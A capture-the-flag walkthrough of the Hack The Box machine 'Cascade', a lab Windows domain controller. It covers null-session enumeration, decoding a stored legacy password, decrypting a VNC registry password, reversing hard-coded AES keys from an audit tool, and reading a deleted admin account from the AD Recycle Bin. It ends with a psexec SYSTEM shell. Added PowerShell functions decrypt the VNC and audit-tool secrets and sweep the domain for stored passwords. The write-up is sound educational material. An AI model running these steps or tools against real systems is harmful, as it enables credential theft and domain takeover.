Enumeration

Let's start!

First let's create a directory for this box.

mkdir ~/hackthebox/cascade
cd ~/hackthebox/cascade

Now, to find out what's running on the box, let's run nmap. -A turns on version detection, OS detection, the default scripts and traceroute; -oN saves the normal-format output to a file so we can grep it later.

nmap -A -oN nmap 10.10.10.182

# Nmap 7.80 scan initiated Sun Mar 29 21:47:34 2020 as: nmap -A -o nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.19s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-29 16:02:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -26s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-29T16:03:43
|_  start_date: 2020-03-29T15:28:10

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   186.64 ms 10.10.14.1
2   186.82 ms 10.10.10.182

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 29 21:51:46 2020 -- 1 IP address (1 host up) scanned in 251.67 seconds

Only domain-controller services are exposed: DNS, Kerberos, LDAP/LDAPS (plus the global catalog on 3268/3269), SMB and RPC, and no web server. The LDAP banner gives the domain as cascade.local, the host as CASC-DC1, and the OS as Windows Server 2008 R2 SP1. Two details from the host scripts matter later: SMB signing is required (so NTLM relay against this host is not an option), and the clock skew is only 26 seconds, well inside the 5-minute tolerance Kerberos tooling needs.

Next, as with most Windows boxes, I like to run enum4linux. -a runs every enumeration it knows (users, groups, shares, password policy) and it needs no credentials, so anything it returns is information the DC hands to an anonymous SMB/RPC session.

enum4linux -a 10.10.10.182 | tee enum4linux

It got a list of domain users over a null session, which is a finding in itself. Let's pull the names out of the "Account:" lines (the name is the eighth whitespace-separated field).

cat enum4linux | grep "Account: " | awk '{print $8}' | tee users.txt

a.turnbull
arksvc
b.hanson
BackupSvc
CascGuest
d.burman
e.crowe
i.croft
j.allen
j.goodhand
j.wakefield
r.thompson
s.hickson
s.smith
util

Let's add the domain name in our /etc/hosts file.

vi /etc/hosts

10.10.10.182	cascade.local

Let's try ldapsearch as well. -x requests a simple bind and, with no -D/-w, that is an anonymous bind; by default an AD DC only lets anonymous binds read the RootDSE, so if this returns user objects the domain has been configured to allow anonymous reads.

ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" | tee ldapsearch       

Wow, that's a lot of data. Two things are worth pulling out of the dump:

Takeaway:
(From the user object for r.thompson)
cascadeLegacyPwd: clk0bjVldmE=

operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1

cascadeLegacyPwd is not a standard AD attribute; it is a custom schema extension, and the value looks like base64. Let's decode it.

root@kali:~/hackthebox/cascade# echo "clk0bjVldmE=" | base64 -d
rY4n5eva

Now, let's try these creds with crackmapexec.

root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\r.thompson:rY4n5eva 
[*] KTHXBYE!

Nice. Now, let's try to list shares.

root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\r.thompson:rY4n5eva 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!

User

So, we have read permissions on some of the shares. Now, let's go through them, starting with Data, which is the only non-default one we can read.

root@kali:~/hackthebox/cascade# smbclient -U r.thompson \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password: 
smb: \> ls
smb: \> recurse on
smb: \> ls

In the recursive listing you should see IT\Email Archives\Meeting_Notes_June_2018.html. Download it and open it.

The email says a temporary account, TempAdmin, was created for a migration, and that its password is "the normal admin account password". File that away for later.
The other interesting file is VNC Install.reg under IT\Temp\s.smith.
If you download that file and cat it, you should see a hex password.

cat VNC\ Install.reg

	"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

Searching for a VNC password decoder, you should find this GitHub repo:
https://github.com/trinitronx/vncpasswd.py

root@kali:~/hackthebox/cascade# git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
root@kali:~/hackthebox/cascade# cd vncpasswd.py
root@kali:~/hackthebox/cascade/vncpasswd.py# ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
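The two "Cannot read/write Windows Registry" lines are only the script noticing it is not on Windows; the decrypted value is what matters. What vncpasswd.py is doing, as an added example that is not part of the original writeup or of the vncpasswd.py project: VNC "encrypts" the stored password with DES under one fixed key that is published in the reference implementation, so the registry value is obfuscation rather than protection and anyone who can read it can recover the password. The function below needs only the .NET DES class, so it runs on any Windows host or in pwsh on Linux; the function name is mine and the hex input is the value from VNC Install.reg.

```powershell
function ConvertFrom-VncPassword {
    <#
      Decrypt a VNC "Password" registry value. Added example, not the writeup's or the
      vncpasswd.py project's code. VNC NUL-pads the password to 8 bytes and DES-encrypts
      that single block with one fixed key, so the operation is reversible by design.
    #>
    param(
        # Accepts either "6bcf2a4b6e5aca0f" or the raw .reg form "6b,cf,2a,4b,6e,5a,ca,0f".
        [Parameter(Mandatory)][string]$HexPassword
    )

    $hex = $HexPassword -replace '[^0-9A-Fa-f]', ''
    if ($hex.Length -ne 16) { throw "expected 8 bytes of ciphertext, got $($hex.Length / 2)" }
    $cipherText = [byte[]](0..7 | ForEach-Object { [Convert]::ToByte($hex.Substring(2 * $_, 2), 16) })

    # The reference implementation's key is {23,82,107,6,35,78,88,7} = 17 52 6b 06 23 4e 58 07,
    # but its d3des routines consume key bits in reversed order. A standard DES implementation
    # therefore needs every byte bit-reversed: e8 4a d6 60 c4 72 1a e0 (the same key the common
    # openssl one-liner for VNC passwords uses).
    $fixedKey = [byte[]](0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0)

    $des = [System.Security.Cryptography.DES]::Create()
    try {
        $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB    # one block, no IV involved
        $des.Padding = [System.Security.Cryptography.PaddingMode]::None  # exactly one 8-byte block
        $des.Key     = $fixedKey
        $plain = $des.CreateDecryptor().TransformFinalBlock($cipherText, 0, $cipherText.Length)
    }
    finally {
        $des.Dispose()
    }

    # Shorter passwords were NUL-padded before encryption (and VNC truncates at 8 characters).
    return [System.Text.Encoding]::ASCII.GetString($plain).TrimEnd([char]0)
}

# Value taken from "VNC Install.reg" above: "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
ConvertFrom-VncPassword -HexPassword '6b,cf,2a,4b,6e,5a,ca,0f'
```

For the value above this returns sT333ve2, the same string vncpasswd.py printed. Any VNC flavour that keeps the classic 8-byte registry or ~/.vnc/passwd format (RealVNC, TightVNC, UltraVNC) decrypts the same way; only the key storage location differs.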

The .reg file sat in s.smith's folder and the password reads like "Steve", so it is most likely s.smith's.
Let's try to log in with evil-winrm. WinRM listens on 5985, which is not in nmap's default top-1000 list and so did not show up in the scan above; a full port scan (-p-) confirms it is open.

./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2

Nice, we are in.

User 2

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Two groups in that output explain what s.smith can do: Remote Management Users is what allows the WinRM login, and Audit Share points at the Audit$ share r.thompson was refused. Before chasing that, let's get winPEAS onto the box.

*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /root/hackthebox/remote/winPEAS.exe .

Run winPEAS.exe

.\winPEAS.exe

  [+] Looking for AutoLogon credentials(T1012)                                       
    Some AutoLogon credentials were found!!                                          
    DefaultDomainName             :  CASCADE                                         
    DefaultUserName               :  vbscrub  
    
  [+] Unnattend Files()
    C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password>     <Enabled>true</Enabled>      <Username>vbscrub</Username>     </AutoLogon>    <UserAccounts>     <LocalAccounts>      <LocalAccount wcm:action="add">      
 <Password>*SENSITIVE*DATA*DELETED*</Password>

The AutoLogon entry is for a local account (vbscrub) and the password in the unattend file has been scrubbed, so there is nothing usable there. Let's instead check what s.smith can reach that r.thompson couldn't, starting with the shares.

root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\s.smith:sT333ve2 
[*] KTHXBYE!


root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\s.smith:sT333ve2 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          READ
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!

Audit$ is the share that is new to us (no surprise, given the Audit Share group). Let's look at it.

smbclient -U s.smith \\\\10.10.10.182\\Audit$

smb: \> ls
smb: \> recurse on
smb: \> ls

Three files stand out: CascAudit.exe, RunAudit.bat and DB\Audit.db.
Let's download all of them.

smb: \> get CascAudit.exe 
smb: \> get RunAudit.bat
smb: \> get DB\Audit.db

Back on the Kali machine, the bat file is a one-liner.

cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

It runs the exe with the UNC path of Audit.db as its only argument.

Audit.db is a SQLite database. Open it and you will find a table with a username (ArkSvc) and a password column, but the password value is base64 that decodes to binary junk rather than text, so it is encrypted, not merely encoded. Since the audit tool has to decrypt that value to use it, the key and the algorithm must live in CascAudit.exe or in a library it loads, and the share also contains CascCrypto.dll, which is the obvious candidate. Grab that too.

smb: \> get CascCrypto.dll

So, its Reverse Engineering. I haven't done much of it, and just thinking of it I'm kinda getting pissed.

Download the decompiler (the cross-platform ILSpy build) from here:
https://github.com/icsharpcode/AvaloniaILSpy

mkdir /tools/ILSpy/
mv ILSpy-linux-x64-Release.zip /tools/ILSpy/
cd /tools/ILSpy/
unzip ILSpy-linux-x64-Release.zip 
chmod a+x ILSpy
./ILSpy

Opening the DLL, the interesting method is DecryptString. It is AES in CBC mode with a hard-coded IV, and the key comes from the caller:

	public static string DecryptString(string EncryptedString, string Key)
	{
		//Discarded unreachable code: IL_009e

		byte[] array = Convert.FromBase64String(EncryptedString);   // value exactly as stored in Audit.db
		Aes aes = Aes.Create();
		aes.KeySize = 128;
		aes.BlockSize = 128;
		aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");        // hard-coded IV, reused for every record
		aes.Mode = CipherMode.CBC;
		aes.Key = Encoding.UTF8.GetBytes(Key);                      // key is supplied by CascAudit.exe
		using (MemoryStream stream = new MemoryStream(array))
		{
			using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
			{
				// Buffer is sized to the ciphertext; Read fills it with the unpadded plaintext and
				// leaves the rest zero, so the returned string can carry trailing NUL characters.
				byte[] array2 = new byte[checked(array.Length - 1 + 1)];
				cryptoStream.Read(array2, 0, array2.Length);
				return Encoding.UTF8.GetString(array2);
			}
		}
	}

That gives us the IV. The key is not in the DLL, so it has to come from the caller; open CascAudit.exe in ILSpy as well and look for the call to DecryptString. Yikes, more reverse engineering, but it is short.

Going through it, we find the key: it is passed to DecryptString as a string literal.

Type: AES-128, CBC mode, PKCS#7 padding (the .NET default)
Key: c4scadek3y654321
IV: 1tdyjCbY1Ix49842

In CyberChef, feed in the base64 value from Audit.db, add a From Base64 operation and then AES Decrypt with Mode CBC, Key as UTF8, IV as UTF8, Input Raw and Output Raw. That gives the password: w3lc0meFr31nd
Phew.

https://gchq.github.io/CyberChef/

The row it came from is ArkSvc's, so this is the password for the user ArkSvc.
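The CyberChef step done in code, as an added PowerShell example that is not part of the original writeup or of the Cascade binaries: it wraps the same System.Security.Cryptography.Aes calls the decompiled DecryptString uses, with the key from CascAudit.exe and the IV from CascCrypto.dll. The function names are mine; the only input you supply is the base64 string from the password column of Audit.db.

```powershell
# Added example, not the writeup's or CascCrypto.dll's own code: the scheme recovered from the
# decompilation (AES-128-CBC, PKCS7 padding, key and IV both hard-coded in the binaries)
# reimplemented so the Audit.db value can be decrypted anywhere PowerShell runs.

$CascKey = 'c4scadek3y654321'   # string literal in CascAudit.exe (16 bytes = AES-128)
$CascIV  = '1tdyjCbY1Ix49842'   # string literal in CascCrypto.dll, reused for every record

function New-CascAes {
    param([string]$Key, [string]$IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize   = 128
    $aes.BlockSize = 128
    $aes.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding   = [System.Security.Cryptography.PaddingMode]::PKCS7   # .NET default, as in the DLL
    $aes.Key       = [System.Text.Encoding]::UTF8.GetBytes($Key)
    $aes.IV        = [System.Text.Encoding]::UTF8.GetBytes($IV)
    return $aes
}

function Unprotect-CascString {
    # Mirrors CascCrypto's DecryptString. TransformFinalBlock strips the padding itself, so
    # unlike the DLL's fixed-size buffer there are no trailing NULs to trim.
    param([Parameter(Mandatory)][string]$EncryptedString, [string]$Key = $CascKey, [string]$IV = $CascIV)
    $cipherText = [Convert]::FromBase64String($EncryptedString)
    $aes = New-CascAes -Key $Key -IV $IV
    try     { $plain = $aes.CreateDecryptor().TransformFinalBlock($cipherText, 0, $cipherText.Length) }
    finally { $aes.Dispose() }
    return [System.Text.Encoding]::UTF8.GetString($plain)
}

function Protect-CascString {
    # The inverse, so the implementation can be checked against a known plaintext before
    # it is trusted on the database value.
    param([Parameter(Mandatory)][string]$PlainText, [string]$Key = $CascKey, [string]$IV = $CascIV)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText)
    $aes = New-CascAes -Key $Key -IV $IV
    try     { $cipherText = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length) }
    finally { $aes.Dispose() }
    return [Convert]::ToBase64String($cipherText)
}

# Self-check: the password recovered above must survive a round trip under the same key/IV.
$roundTrip = Unprotect-CascString -EncryptedString (Protect-CascString -PlainText 'w3lc0meFr31nd')
if ($roundTrip -ne 'w3lc0meFr31nd') { throw 'AES round trip failed; check key and IV' }

# Real use: $valueFromAuditDb is the base64 string you copied from Audit.db (placeholder name).
# Unprotect-CascString -EncryptedString $valueFromAuditDb
```

With a wrong key or IV, .NET normally throws a CryptographicException about invalid padding instead of returning garbage, which is a handy signal when you are not yet sure which string in the binary is the key. The design lesson is the same as with the VNC value: a fixed key shipped next to the ciphertext is not encryption, just one extra step for whoever can read the share.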

./evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Administrator

Damn, this has been one hell of a journey so far. Tough box.

Now, let's recall what we already know from the meeting notes.

  • A temporary account called TempAdmin was created.
  • Its password is the same as the normal admin account's.

Following the pattern of this box, let's first list the SMB shares available to this account.

root@kali:~# crackmapexec smb 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\ArkSvc:w3lc0meFr31nd 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!
root@kali:~# smbclient -U ArkSvc \\\\10.10.10.182\\Data
Enter WORKGROUP\ArkSvc's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 09:12:34 2020
  ..                                  D        0  Mon Jan 27 09:12:34 2020
  Contractors                         D        0  Mon Jan 13 07:30:11 2020
  Finance                             D        0  Mon Jan 13 07:30:06 2020
  IT                                  D        0  Tue Jan 28 23:49:51 2020
  Production                          D        0  Mon Jan 13 07:30:18 2020
  Temps                               D        0  Mon Jan 13 07:30:15 2020

                13106687 blocks of size 4096. 7793454 blocks available
smb: \> recurse on

Another ls with recursion on shows a log file under IT\Logs\Ark AD Recycle Bin. Fetch it.

smb: \> get IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \> 

The log is the output of a tool, run as ArkSvc, that moves objects into the AD Recycle Bin, and one of the objects it deleted is TempAdmin. So ArkSvc works with the Recycle Bin, and the account we want was deleted rather than disabled. That distinction matters: with the AD Recycle Bin feature enabled, a deleted object is kept with its attributes intact for the deleted-object lifetime (180 days by default) instead of being stripped down to a bare tombstone.

First, confirm the object is still there by searching the Deleted Objects container.

https://docs.microsoft.com/en-us/powershell/module/addsadministration/restore-adobject?view=win10-ps

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

Now, let's try to restore the user.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject                                                                   
Insufficient access rights to perform the operation                                                                                                                                                          
At line:1 char:80                                                                                                                                                                                            
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject                                                                                                                                  
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Insufficient access rights. Reading deleted objects and restoring them are separate permissions: ArkSvc can evidently list and read the Deleted Objects container (the query above worked, and an ordinary user cannot do that), but Restore-ADObject also needs the Reanimate-Tombstones control access right on the domain and create-child rights on the original parent OU, which ArkSvc does not have.
It doesn't matter, though. Since the Recycle Bin keeps the object's attributes, we can read the account as it was before deletion.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

There is cascadeLegacyPwd again, the same custom attribute that gave up r.thompson's password, preserved on the deleted object. Let's base64 decode it.

root@kali:~/Desktop# echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
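A sweep for every cascadeLegacyPwd value in the domain, live objects and deleted ones together, as an added example that is not part of the original writeup. It uses the same Get-ADObject cmdlet as above from the ArkSvc session, which can read the Deleted Objects container; with -LiveOnly it works from any authenticated account and returns what the anonymous ldapsearch earlier found for r.thompson. The function name and the -LiveOnly switch are mine.

```powershell
function Get-CascadeLegacyPassword {
    <#
      Added example, not the writeup's code. Find every object carrying the custom
      cascadeLegacyPwd attribute, tombstones included, and base64-decode the value.
      Deleted objects keep their attributes while the AD Recycle Bin holds them, so the
      search covers accounts that no longer exist as well as current ones.
    #>
    param(
        [string]$SearchBase = 'DC=cascade,DC=local',
        [switch]$LiveOnly     # use when the caller cannot read CN=Deleted Objects
    )

    $query = @{
        SearchBase = $SearchBase
        LDAPFilter = '(cascadeLegacyPwd=*)'   # evaluated server-side: only objects that have the attribute
        Properties = 'sAMAccountName', 'cascadeLegacyPwd', 'lastKnownParent'
    }
    if (-not $LiveOnly) { $query.IncludeDeletedObjects = $true }

    Get-ADObject @query | ForEach-Object {
        $obj = $_
        try {
            $decoded = [System.Text.Encoding]::UTF8.GetString(
                [Convert]::FromBase64String($obj.cascadeLegacyPwd))
        } catch {
            $decoded = "<not base64: $($_.Exception.Message)>"
        }
        [pscustomobject]@{
            sAMAccountName  = $obj.sAMAccountName
            Deleted         = [bool]$obj.Deleted
            LastKnownParent = $obj.lastKnownParent   # original OU of a deleted object, empty for live ones
            LegacyPwd       = $decoded
        }
    }
}

Get-CascadeLegacyPassword | Format-Table -AutoSize
```

On this domain it returns at least the two entries found by hand above, r.thompson (live) and TempAdmin (Deleted True), with the values already decoded. The broader point for an assessment: a custom attribute holding a secret is readable by anyone with Read Property on the object unless the schema marks it confidential, and deleting the account does not remove it while the Recycle Bin retains the object.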

The meeting notes said TempAdmin's password was the normal admin account's password, so let's try it as Administrator and get a shell.
Let's use psexec.py this time. It needs to write to ADMIN$ and create a service, so it only succeeds if the account really is a local administrator on the DC, which doubles as confirmation of the reuse.

root@kali:/usr/share/doc/python3-impacket/examples# ./psexec.py cascade.local/Administrator:"baCT3r1aN00dles"@10.10.10.182
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file MelpKkvH.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service tCEG on 10.10.10.182.....
[*] Starting service tCEG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Nice. That's all.
Congratulations! That's one hell of a box!